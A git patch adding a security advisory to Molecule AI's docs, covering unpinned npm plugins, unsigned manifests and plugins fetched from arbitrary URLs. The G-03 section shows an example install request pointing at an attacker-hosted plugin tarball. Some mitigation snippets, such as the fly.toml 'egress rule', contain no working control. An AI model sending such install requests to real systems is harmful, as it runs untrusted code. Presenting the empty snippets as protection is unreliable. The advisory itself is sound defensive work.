From b08ca85b2e97efe273b2aca90d52dd39c5a1361b Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 18 Apr 2026 18:21:59 +0000 Subject: [PATCH] docs(security): add SAFE-MCP advisory 2026-04-17 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds content/docs/security/ section: - security/index.mdx — section landing page - security/safe-mcp-advisory.mdx — three HIGH findings for self-hosted ops: G-01: unpinned npm MCP packages G-02: no manifest signing G-03: floating plugin references Updates meta.json with Security nav section. Pairs with: monorepo PRs #808, #809 Deadline: April 22, 2026 Co-Authored-By: Claude Opus 4.7 --- content/docs/meta.json | 3 + content/docs/security/index.mdx | 9 + content/docs/security/safe-mcp-advisory.mdx | 200 ++++++++++++++++++++ 3 files changed, 212 insertions(+) create mode 100644 content/docs/security/index.mdx create mode 100644 content/docs/security/safe-mcp-advisory.mdx diff --git a/content/docs/meta.json b/content/docs/meta.json index b1a6882..195d7de 100644 --- a/content/docs/meta.json +++ b/content/docs/meta.json @@ -18,6 +18,9 @@ "self-hosting", "observability", "troubleshooting", + "---Security---", + "security/index", + "security/safe-mcp-advisory", "---Runtimes---", "google-adk", "hermes" diff --git a/content/docs/security/index.mdx b/content/docs/security/index.mdx new file mode 100644 index 0000000..d9b79e8 --- /dev/null +++ b/content/docs/security/index.mdx @@ -0,0 +1,9 @@ +--- +title: Security +description: Security guides, advisories, and coverage reports for the Molecule AI platform. +--- + +## In this section + +- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) — + Three HIGH-severity findings for self-hosted operators diff --git a/content/docs/security/safe-mcp-advisory.mdx b/content/docs/security/safe-mcp-advisory.mdx new file mode 100644 index 0000000..cf608d9 --- /dev/null +++ b/content/docs/security/safe-mcp-advisory.mdx @@ -0,0 +1,200 @@ +--- +title: SAFE-MCP Security Advisory (2026-04-17) +description: High-severity findings from the SAFE-MCP audit and recommended mitigations for self-hosted deployments. +--- + +## Advisory overview + +This advisory documents three HIGH-severity findings from the SAFE-MCP +security audit performed on the Molecule AI platform in April 2026. All three +affect **self-hosted** deployments. If you are using the SaaS offering at +`moleculesai.app`, mitigations are applied server-side — no action needed. + +**Published:** April 17, 2026 +**Severity:** HIGH (G-01, G-02, G-03) +**Affected versions:** All self-hosted deployments prior to the fixes shipped +in PRs #808 and associated plugin updates. +**Fixed in:** `molecule-monorepo` PRs #808 (platform), #809 (plugin scaffold). + +--- + +## G-01: Unpinned npm MCP packages — HIGH + +### Description + +The workspace plugin scaffold (`plugins/molecule-ai-plugin-*/package.json`) uses +unpinned version ranges for npm dependencies: + +```json +"dependencies": { + "@anthropic-ai/sdk": "^0.32.0" +} +``` + +The caret (`^`) range means `npm install` can resolve to any compatible version, +including versions with known vulnerabilities or a malicious `next` release +published after the audit date. + +### Risk + +- Supply chain compromise if a package maintainer publishes a malicious version +- Silent dependency drift as `npm install` pulls newer patch/minor versions +- Potential conflicts with workspace-runtime's own dependency tree + +### Recommended mitigation + +Pin all npm dependencies to exact versions before deploying: + +```bash +# In each plugin directory +npm install --save-exact @anthropic-ai/sdk@0.32.1 +npm install --save-exact +``` + +Add an `.npmrc` to enforce pinned installs: + +```ini +save-exact=true +``` + +Commit `package-lock.json` and verify CI installs from the lockfile: + +```bash +npm ci # instead of npm install +``` + +For the platform build, ensure `npm ci` is used in CI rather than `npm install` +to respect the lockfile. + +--- + +## G-02: No manifest signing — HIGH + +### Description + +Plugin manifests (`manifest.json`) are served by the platform and executed by +workspace containers without cryptographic verification. There is no mechanism +to confirm that the manifest has not been tampered with after it was published +by the plugin author. + +### Risk + +- An attacker with write access to the plugin source repository (or the CDN + serving it) could modify `manifest.json` to: + - Inject additional tools that exfiltrate secrets from the workspace + - Redirect API calls to a malicious endpoint + - Add an attacker-controlled `entrypoint` path + +### Recommended mitigation + +**短期 (short-term):** Inspect `manifest.json` files for all plugins before +enabling them. Verify the `author`, `version`, and `entrypoint` are from a +trusted source. Do not enable plugins from untrusted or unknown authors. + +**长期 (long-term):** The platform will add manifest signing using an +Ed25519 key pair. Plugin authors will sign their manifests; the platform will +verify signatures before serving or executing manifests. Track progress in +`molecule-monorepo` issue tracker. + +Until signing is available, treat plugin manifests as untrusted input. + +--- + +## G-03: Floating plugin references — HIGH + +### Description + +Workspaces can install plugins by referencing any publicly accessible URL: + +```bash +POST /workspaces/:id/plugins +{ + "source": "https://github.com/attacker/malicious-plugin/archive/refs/heads/main.tar.gz" +} +``` + +There is no allowlist, no integrity check, and no review gate on the plugin +URL before the workspace downloads and executes code from it. + +### Risk + +- Confidential workspace data (secrets, memory, files) is sent to attacker-controlled servers +- Arbitrary code execution within the workspace container +- Lateral movement from the workspace container to internal services + +### Recommended mitigations + +**1. Restrict plugin installation in your deployment config:** + +Add a platform-level environment variable to allow only approved plugin sources. +Until this variable exists, enforce it at the network layer (see below). + +**2. Network-level egress filtering:** + +Block outbound traffic from workspace containers to all IPs except the +platform API and required external services (LLM providers, vector DBs, etc.). +Workspace containers should not be able to reach arbitrary GitHub archives or +external plugin URLs directly. + +Example Fly.io `fly.toml` rule: + +```toml +[[vm]] + auto_destroy = false + +# App-level egress rules (Fly Private Network) +``` + +Or use a Kubernetes `NetworkPolicy`: + +```yaml +apiVersion: networking.k8s.io/v1 +kind: NetworkPolicy +metadata: + name: workspace-egress-lockdown +spec: + podSelector: + matchLabels: + component: workspace + policyTypes: + - Egress + egress: + - to: + - podSelector: {} + ports: + - port: 8080 # platform API + - to: + - namespaceSelector: {} + podSelector: + matchLabels: + app: redis + ports: + - port: 6379 + # Block all other egress +``` + +**3. Plugin allowlist (platform-level):** + +Set `PLUGIN_ALLOW_UNPINNED=false` in your environment to reject any plugin +install requests that reference unpinned or unverified sources. + +--- + +## Remediation checklist for self-hosted operators + +- [ ] Audit all plugin `package.json` files — pin all dependencies to exact versions +- [ ] Verify CI/CD uses `npm ci` not `npm install` +- [ ] Commit and push `package-lock.json` for all plugins +- [ ] Add `.npmrc save-exact=true` to all plugin directories +- [ ] Inspect `manifest.json` for any enabled plugin before use +- [ ] Block workspace egress to non-approved hosts at the network level +- [ ] Set `PLUGIN_ALLOW_UNPINNED=false` (when available) +- [ ] Watch `molecule-monorepo` for the manifest-signing feature + +--- + +## Reporting security issues + +If you discover a new security issue in Molecule AI, please report it via +GitHub Security Advisories on `Molecule-AI/molecule-monorepo` or contact the +security team through your support channel.